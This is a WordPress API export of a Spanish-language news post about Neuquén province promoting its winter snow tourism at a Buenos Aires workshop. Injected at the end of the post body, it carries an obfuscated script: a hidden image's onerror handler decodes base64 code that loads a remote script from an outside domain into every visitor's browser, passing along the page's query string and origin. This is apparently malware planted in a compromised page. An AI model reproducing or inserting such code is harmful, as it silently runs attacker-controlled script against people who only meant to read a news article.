{"id":9686,"date":"2025-06-13T09:15:14","date_gmt":"2025-06-13T12:15:14","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=9686"},"modified":"2025-08-13T15:27:11","modified_gmt":"2025-08-13T18:27:11","slug":"la-provincia-desplego-su-oferta-turistica-de-nieve-en-buenos-aires","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=9686","title":{"rendered":"La provincia de Neuqu\u00e9n despleg\u00f3 su oferta tur\u00edstica de nieve en Buenos Aires"},"content":{"rendered":"\n<p><strong><em>Se realiz\u00f3 un encuentro que congreg\u00f3 a 62 agencias de viajes con m\u00e1s de 90 vendedores en ronda de negocios y una decena de medios de prensa. En la actividad -en la que tambi\u00e9n se despleg\u00f3 en el Obelisco un llamativo inflable con la marca Neuqu\u00e9n con nieve-, reuni\u00f3 a expositores del sector privado, destinos tur\u00edsticos y los centros de esqu\u00ed.<\/em><\/strong><\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright size-full is-resized\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/06\/poratada1-2.jpeg\"><img decoding=\"async\" width=\"457\" height=\"694\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/06\/poratada1-2.jpeg\" alt=\"\" class=\"wp-image-9688\" style=\"width:212px;height:auto\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/06\/poratada1-2.jpeg 457w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/06\/poratada1-2-198x300.jpeg 198w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/06\/poratada1-2-277x420.jpeg 277w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/06\/poratada1-2-320x486.jpeg 320w\" sizes=\"(max-width: 457px) 100vw, 457px\" \/><\/a><figcaption class=\"wp-element-caption\"><em><sup>Publicidad<\/sup><\/em><\/figcaption><\/figure>\n<\/div>\n\n\n<p>El gobierno provincial, a trav\u00e9s de la empresa Neuquentur S.E, realiz\u00f3 el primer Workshop Neuqu\u00e9n en Buenos Aires que congreg\u00f3 a 150 participantes directos, 62 agencias de viajes con m\u00e1s de 90 vendedores en ronda de negocios y medios de prensa.<\/p>\n\n\n\n<p>El evento comercial que se realiz\u00f3 d\u00edas atr\u00e1s en el Hotel Grand Brizo, tuvo como objetivo que operadores tur\u00edsticos de esa ciudad incluyan la oferta de productos para la temporada invernal 2025.<\/p>\n\n\n\n<p>La actividad -en la que tambi\u00e9n se despleg\u00f3 en el Obelisco un llamativo inflable con la marca Neuqu\u00e9n con nieve -, reuni\u00f3 a expositores del sector privado, destinos tur\u00edsticos de nieve y los centros de esqu\u00ed neuquinos.<\/p>\n\n\n\n<p>En la apertura del evento, el presidente de la empresa, S<strong>ergio Sciacchitano<\/strong>, agradeci\u00f3 la presencia de los invitados y convoc\u00f3 al \u00e1mbito privado porte\u00f1o a intercambiar relaciones comerciales con las empresas y destinos presentes.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/06\/md.webp\"><img decoding=\"async\" width=\"992\" height=\"661\" data-id=\"9689\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/06\/md.webp\" alt=\"\" class=\"wp-image-9689\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/06\/md.webp 992w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/06\/md-300x200.webp 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/06\/md-768x512.webp 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/06\/md-696x464.webp 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/06\/md-630x420.webp 630w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/06\/md-320x213.webp 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/06\/md-480x320.webp 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/06\/md-800x533.webp 800w\" sizes=\"(max-width: 992px) 100vw, 992px\" \/><\/a><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/06\/sm.webp\"><img decoding=\"async\" width=\"768\" height=\"512\" data-id=\"9690\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/06\/sm.webp\" alt=\"\" class=\"wp-image-9690\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/06\/sm.webp 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/06\/sm-300x200.webp 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/06\/sm-696x464.webp 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/06\/sm-630x420.webp 630w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/06\/sm-320x213.webp 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/06\/sm-480x320.webp 480w\" sizes=\"(max-width: 768px) 100vw, 768px\" \/><\/a><\/figure>\n<\/figure>\n\n\n\n<p>Ante referentes de agencias de viajes mayoristas y minoristas de esa ciudad y la provincia de Buenos Aires, en el Worshop se brind\u00f3 informaci\u00f3n tur\u00edstica, se proyectaron spot y videos promocionales, se entregaron material de merchadising, se ofreci\u00f3 degustaci\u00f3n de alfajores artesanales, y se realizaron sorteos de viajes a los destinos de nieve, excursiones, estad\u00edas, pases de ski y productos gastron\u00f3micos.<\/p>\n\n\n\n<p>Posteriormente en el Obelisco (en la calle 9 de julio y Cerrito) se puso en escena un llamativo inflable con la marca Neuqu\u00e9n con efecto nieve, realizado con m\u00e1quinas artificiales.<\/p>\n\n\n\n<p>Participaron en la actividad, autoridades y equipo de Neuquentur, sectores p\u00fablicos y privados, y Tripin Argentina para un trabajo audiovisual.<\/p>\n\n\n\n<p>La delegaci\u00f3n neuquina estuvo integrada por la directora provincial de Comercializaci\u00f3n&nbsp;<strong>Marina Gonz\u00e1lez<\/strong>&nbsp;y equipo t\u00e9cnico, y por los miembros del directorio de la empresa,&nbsp;<strong>Rodrigo Oriolo<\/strong>&nbsp;y&nbsp;<strong>Thais Guterres<\/strong>.<\/p>\n\n\n\n<p>Asimismo, estuvieron presentes la directora provincial de Casa de Neuqu\u00e9n en Buenos Aires,&nbsp;<strong>Josefina Rabanaqu<\/strong>e; el presidente de la Federaci\u00f3n Argentina de Asociaciones de Empresas de Viajes y Turismo,&nbsp;<strong>Andr\u00e9s Dey\u00e1<\/strong>&nbsp;y el director Nacional de Desarrollo y Promoci\u00f3n de la Subsecretar\u00eda de Turismo de la Naci\u00f3n,&nbsp;<strong>Pablo Cagnoni<\/strong>.<\/p>\n\n\n\n<p>Entre los expositores se destacaron Aerol\u00edneas Argentinas y la comitiva neuquina de los sectores p\u00fablico y privado compuesto por casi 40 expositores representados en cada una de las regiones tur\u00edsticas. Tambi\u00e9n fueron parte del evento c\u00e1maras, asociaciones de turismo y en los rubros de alojamiento, agencias de viajes y gu\u00edas de pesca y trekking, entre otras.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/06\/Captura-de-pantalla_13-6-2025_9736_www.neuqueninforma.gob_.ar_.jpeg\"><img decoding=\"async\" width=\"594\" height=\"165\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/06\/Captura-de-pantalla_13-6-2025_9736_www.neuqueninforma.gob_.ar_.jpeg\" alt=\"\" class=\"wp-image-9687\" style=\"width:266px;height:auto\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/06\/Captura-de-pantalla_13-6-2025_9736_www.neuqueninforma.gob_.ar_.jpeg 594w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/06\/Captura-de-pantalla_13-6-2025_9736_www.neuqueninforma.gob_.ar_-300x83.jpeg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/06\/Captura-de-pantalla_13-6-2025_9736_www.neuqueninforma.gob_.ar_-320x89.jpeg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/06\/Captura-de-pantalla_13-6-2025_9736_www.neuqueninforma.gob_.ar_-480x133.jpeg 480w\" sizes=\"(max-width: 594px) 100vw, 594px\" \/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Se realiz\u00f3 un encuentro que congreg\u00f3 a 62 agencias de viajes con m\u00e1s de 90 vendedores en ronda de negocios y una decena de medios de prensa. En la actividad -en la que tambi\u00e9n se despleg\u00f3 en el Obelisco un llamativo inflable con la marca Neuqu\u00e9n con nieve-, reuni\u00f3 a expositores del sector privado, destinos [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":9690,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[29,21],"tags":[],"class_list":["post-9686","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-datos-utiles","category-patagonia"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/9686","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9686"}],"version-history":[{"count":3,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/9686\/revisions"}],"predecessor-version":[{"id":9905,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/9686\/revisions\/9905"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/9690"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9686"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9686"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9686"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}